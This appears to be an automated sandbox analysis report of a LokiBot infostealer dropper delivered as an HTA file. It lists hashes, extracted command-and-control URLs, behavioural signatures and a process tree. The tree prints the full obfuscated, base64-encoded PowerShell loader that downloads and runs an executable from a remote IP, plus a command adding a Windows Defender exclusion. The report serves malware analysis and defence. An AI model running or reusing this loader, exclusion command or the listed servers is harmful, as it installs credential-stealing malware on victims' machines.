Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 10:02
Static task
static1
Behavioral task
behavioral1
Sample
goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
Resource
win10v2004-20241007-en
General
-
Target
goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
-
Size
23KB
-
MD5
ec0d423a3f72d69975a1e31a275f5377
-
SHA1
213922fb8456ecaadc24889afec1ac6ef5010c68
-
SHA256
9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
-
SHA512
8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad
-
SSDEEP
96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2140 poWERShell.eXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 524 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2524 powershell.exe 2140 poWERShell.eXe -
Executes dropped EXE 2 IoCs
pid Process 2400 wininit.exe 2416 wininit.exe -
Loads dropped DLL 3 IoCs
pid Process 2140 poWERShell.eXe 2140 poWERShell.eXe 2140 poWERShell.eXe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wininit.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wininit.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wininit.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2400 set thread context of 2416 2400 wininit.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wininit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWERShell.eXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2140 poWERShell.eXe 2524 powershell.exe 524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2140 poWERShell.eXe Token: SeDebugPrivilege 2524 powershell.exe Token: SeDebugPrivilege 524 powershell.exe Token: SeDebugPrivilege 2416 wininit.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 2736 wrote to memory of 2140 2736 mshta.exe 30 PID 2736 wrote to memory of 2140 2736 mshta.exe 30 PID 2736 wrote to memory of 2140 2736 mshta.exe 30 PID 2736 wrote to memory of 2140 2736 mshta.exe 30 PID 2140 wrote to memory of 2524 2140 poWERShell.eXe 32 PID 2140 wrote to memory of 2524 2140 poWERShell.eXe 32 PID 2140 wrote to memory of 2524 2140 poWERShell.eXe 32 PID 2140 wrote to memory of 2524 2140 poWERShell.eXe 32 PID 2140 wrote to memory of 1700 2140 poWERShell.eXe 33 PID 2140 wrote to memory of 1700 2140 poWERShell.eXe 33 PID 2140 wrote to memory of 1700 2140 poWERShell.eXe 33 PID 2140 wrote to memory of 1700 2140 poWERShell.eXe 33 PID 1700 wrote to memory of 480 1700 csc.exe 34 PID 1700 wrote to memory of 480 1700 csc.exe 34 PID 1700 wrote to memory of 480 1700 csc.exe 34 PID 1700 wrote to memory of 480 1700 csc.exe 34 PID 2140 wrote to memory of 2400 2140 poWERShell.eXe 36 PID 2140 wrote to memory of 2400 2140 poWERShell.eXe 36 PID 2140 wrote to memory of 2400 2140 poWERShell.eXe 36 PID 2140 wrote to memory of 2400 2140 poWERShell.eXe 36 PID 2400 wrote to memory of 524 2400 wininit.exe 38 PID 2400 wrote to memory of 524 2400 wininit.exe 38 PID 2400 wrote to memory of 524 2400 wininit.exe 38 PID 2400 wrote to memory of 524 2400 wininit.exe 38 PID 2400 wrote to memory of 2416 2400 wininit.exe 40 PID 2400 wrote to memory of 2416 2400 wininit.exe 40 PID 2400 wrote to memory of 2416 2400 wininit.exe 40 PID 2400 wrote to memory of 2416 2400 wininit.exe 40 PID 2400 wrote to memory of 2416 2400 wininit.exe 40 PID 2400 wrote to memory of 2416 2400 wininit.exe 40 PID 2400 wrote to memory of 2416 2400 wininit.exe 40 PID 2400 wrote to memory of 2416 2400 wininit.exe 40 PID 2400 wrote to memory of 2416 2400 wininit.exe 40 PID 2400 wrote to memory of 2416 2400 wininit.exe 40 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wininit.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wininit.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\goodtoseeuthatgreatthingswithentirethingsgreatfor.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2524
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7hpqmqwi.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CE7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6CE6.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:480
-
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:524
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2416
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ac0c76976f611a5eb28b4144220760e2
SHA156297103ab3d7dd9fba971386d9c8e8f668fa9d4
SHA2568aed68b50e3c8000145128d18487a5499c3de0067ff473229111a446b643c9d8
SHA512df29f9413754240e97fe06c8c1f43edb127a29362729a7bb4786f167ae63a3dffdcfa1fee805811ed046f53309de2c496fb96e96c266d7ad3e73fc96e25af736
-
Filesize
7KB
MD5961d4fdd26dc4e680738efa0ed89d35d
SHA1129d99e2959337327caa177a1a04788675437b49
SHA256ad58fab8b3c3dba26b93e77e3bd8a825cc4101125e8d0158a55d4df6314544c8
SHA512004fa5f3d29c6e42e5f373c9314526a26b3871479aa3c189b63ccd86631ba231d37c0c33dc60dea87a8740792501b8a7f98d6eac3bab81d974d040498ec12c97
-
Filesize
1KB
MD5432145e755635f0f7dd4e9d9c001eee1
SHA175424ccdd5f19346dc5409bd3185603fe3875415
SHA2567ba13c1156b68ee9ae337035fcc7dbb5c776ecf2aa1f2259ef86ea1f716e1930
SHA5125a4e27e5e6d399399db7bccbc527b20e2c9b178ce5e58987bac42b03d3a5b7e4b1b472e46f2fced678e665f26a5b9a22a4df80cc6da59dba903864a10b8b9cd8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD51b2c4d0a6025db42f9b466db48e5fc21
SHA14e94dd721efbcbcd92ad8ac0df07a9e076d28bfc
SHA2560d40700c13de59ab4480396c0f5ee4562779323b3d58429af319f94b10c875a2
SHA512e2bf21ead5b4ef6ddc1a530786e84f4cd541adb470b4483b15d9cd3c7a970ae356f9be232625894be982b9372778b020245897334425b0f044061857ea15712e
-
Filesize
586KB
MD566b03d1aff27d81e62b53fc108806211
SHA12557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA25659586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA5129f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d
-
Filesize
480B
MD5b0517586f4097114e790c61f2685f0d5
SHA120f7482298ab96731228ebd5242ceddfd72ff50f
SHA256a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237
SHA512c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0
-
Filesize
309B
MD57b8afc6503dc17dfe8b61f66774b6e72
SHA1c4cf39ff6e133099c54df3513190bcf8c9c5a6c2
SHA256218148fff338066326231a7bb577732d9ed7512a9d75660eb35a9bb37cddea69
SHA512559611bbcd556d3a8fbd6c73ef082ff018170a4cc477d25fe5e4e6b9a36303c87ea54a04b2691880d62b52e911b5e2d552274d273dc4820962f0956c874ad969
-
Filesize
652B
MD518b768dd5925fe340f13409d5e066136
SHA1460cea768f1aa995312ca4d523724fdbe5e0b5b0
SHA256984e926b06ff84a34be9cf6793820fc04f8bda647bc62b37e0818769fce66698
SHA512c24ff59cd84d11f22bff202700c33a095401a403b58ec2a2f1c9cd39a7231a5c221e4f18ebdb09bfe348c65e1f43ff1ebfd744035aa63d6499d7744771d57e33